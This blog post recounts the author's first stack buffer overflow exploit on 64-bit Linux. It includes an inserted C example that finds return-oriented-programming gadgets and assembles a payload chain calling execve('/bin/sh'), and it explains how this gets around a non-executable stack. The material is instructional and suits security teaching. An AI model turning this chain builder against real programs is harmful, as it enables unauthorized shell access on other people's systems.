Sunday, August 26, 2012

Smashing the non-executable stack for fun and profit

In 1996, Elias Levy ("Aleph One") published "Smashing The Stack For Fun And Profit" in Phrack magazine (issue 49). The article showed how to overflow a stack buffer, overwrite the saved return address, and redirect execution into shellcode that launches a shell.

I’m almost ashamed I never took a closer look for over a decade. My background would suggest I’d be one of the early adopters. As a kid, I loved messing with assembly language and poking around the system. I collected computer viruses. I bypassed copy protection systems. I knew how to make free phone calls. In grad school, my advisor and my colleagues taught a computer security class, where rooting a system by smashing the stack was a homework assignment.

With pride, and relief, I can now announce that at long last, in 2012, I have exploited a buffer overflow. Moreover, I have written a truly marvelous step-by-step guide to this, which this post is too narrow to contain. (I’m afraid of overflowing it.) I took notes because I encountered difficulties with other tutorials:

  • 32-bit systems are often assumed. My system is 64-bit.

  • Various countermeasures are now enabled on stock installs.

  • I wanted to try a newer variant of the attack known as return-oriented programming, which defeats one of the countermeasures.
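To make the last point concrete, here is an added example of the two mechanical steps behind return-oriented programming on x86-64 Linux: locate short instruction sequences ending in `ret` ("gadgets") inside already executable code, then lay their addresses on the stack, each followed by the value the gadget pops, so that control flows from one gadget to the next without ever executing bytes on the (non-executable) stack. This is not the author's bonus script and not from the original post. The code bytes being scanned are a constructed sample, not taken from any real binary, and the load base `0x400000`, the padding of 40 bytes up to the saved return address, and the address `0x601000` of a `"/bin/sh"` string are hypothetical values a real exploit would have to recover from the target (a non-PIE binary, an information leak, or a known libc layout).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample of executable code bytes (not from any real binary):
 * a handful of x86-64 sequences ending in ret (0xc3), padded with nops. */
static const uint8_t sample_text[] = {
    0x48, 0x89, 0xc7,        /*  0: mov rdi, rax   (no ret: not a gadget) */
    0x5f, 0xc3,              /*  3: pop rdi; ret */
    0x90, 0x90,              /*  5: nop; nop */
    0x5e, 0xc3,              /*  7: pop rsi; ret */
    0x58, 0xc3,              /*  9: pop rax; ret */
    0x48, 0x31, 0xc0,        /* 11: xor rax, rax */
    0x0f, 0x05, 0xc3,        /* 14: syscall; ret */
    0x5a, 0xc3,              /* 17: pop rdx; ret */
};

/* Encodings of the gadgets the chain below needs. */
static const uint8_t POP_RDI_RET[] = {0x5f, 0xc3};
static const uint8_t POP_RSI_RET[] = {0x5e, 0xc3};
static const uint8_t POP_RDX_RET[] = {0x5a, 0xc3};
static const uint8_t POP_RAX_RET[] = {0x58, 0xc3};
static const uint8_t SYSCALL_RET[] = {0x0f, 0x05, 0xc3};

/* Offset of the first occurrence of pat inside code, or -1 if absent.
 * Real gadget finders disassemble backwards from every 0xc3; a byte
 * search is enough to show the idea. */
long find_gadget(const uint8_t *code, size_t len,
                 const uint8_t *pat, size_t patlen)
{
    for (size_t i = 0; i + patlen <= len; i++)
        if (memcmp(code + i, pat, patlen) == 0)
            return (long)i;
    return -1;
}

/* Write / read a little-endian 64-bit word, the way it sits on the stack. */
static size_t put_u64(uint8_t *out, size_t pos, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[pos + i] = (uint8_t)(v >> (8 * i));
    return pos + 8;
}

uint64_t get_u64(const uint8_t *buf, size_t pos)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | buf[pos + i];
    return v;
}

/* Build the overflow payload: pad filler bytes up to the saved return
 * address, then gadget addresses interleaved with the values they pop,
 * ending in the syscall gadget. The registers end up set for
 * execve(binsh_addr, NULL, NULL), syscall 59 on x86-64 Linux.
 * Returns the payload length, or 0 if a gadget is missing or out is too small. */
size_t build_chain(const uint8_t *code, size_t len, uint64_t base, size_t pad,
                   uint64_t binsh_addr, uint8_t *out, size_t outlen)
{
    long g_rdi = find_gadget(code, len, POP_RDI_RET, sizeof POP_RDI_RET);
    long g_rsi = find_gadget(code, len, POP_RSI_RET, sizeof POP_RSI_RET);
    long g_rdx = find_gadget(code, len, POP_RDX_RET, sizeof POP_RDX_RET);
    long g_rax = find_gadget(code, len, POP_RAX_RET, sizeof POP_RAX_RET);
    long g_sys = find_gadget(code, len, SYSCALL_RET, sizeof SYSCALL_RET);
    if (g_rdi < 0 || g_rsi < 0 || g_rdx < 0 || g_rax < 0 || g_sys < 0)
        return 0;
    if (outlen < pad + 9 * 8)           /* 4 (gadget, value) pairs + syscall */
        return 0;

    memset(out, 'A', pad);               /* filler up to the saved return address */
    size_t p = pad;
    p = put_u64(out, p, base + (uint64_t)g_rdi); p = put_u64(out, p, binsh_addr);
    p = put_u64(out, p, base + (uint64_t)g_rsi); p = put_u64(out, p, 0);   /* argv  = NULL */
    p = put_u64(out, p, base + (uint64_t)g_rdx); p = put_u64(out, p, 0);   /* envp  = NULL */
    p = put_u64(out, p, base + (uint64_t)g_rax); p = put_u64(out, p, 59);  /* execve */
    p = put_u64(out, p, base + (uint64_t)g_sys);
    return p;
}

int main(void)
{
    /* Hypothetical layout: code mapped at 0x400000, 40 bytes of buffer and
     * saved rbp before the return address, "/bin/sh" at 0x601000. */
    uint8_t payload[256];
    size_t n = build_chain(sample_text, sizeof sample_text, 0x400000, 40,
                           0x601000, payload, sizeof payload);
    for (size_t pos = 40; pos < n; pos += 8)
        printf("stack+%zu: 0x%016llx\n", pos - 40,
               (unsigned long long)get_u64(payload, pos));
    return n == 0;
}
```

Each `ret` pops the next word off the stack into `rip`, which is why the chain works with the stack marked non-executable: only addresses and data live there, and every instruction executed comes from a region that was already executable. In practice the gadget search runs over the target binary's `.text` or its libc, ASLR has to be defeated or absent for `base` and `binsh_addr` to be known, and a stack canary between the buffer and the return address would have to be leaked or disabled first.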

Luckily my website has ample room. Read now, and get a bonus shell script that demonstrates the attack!
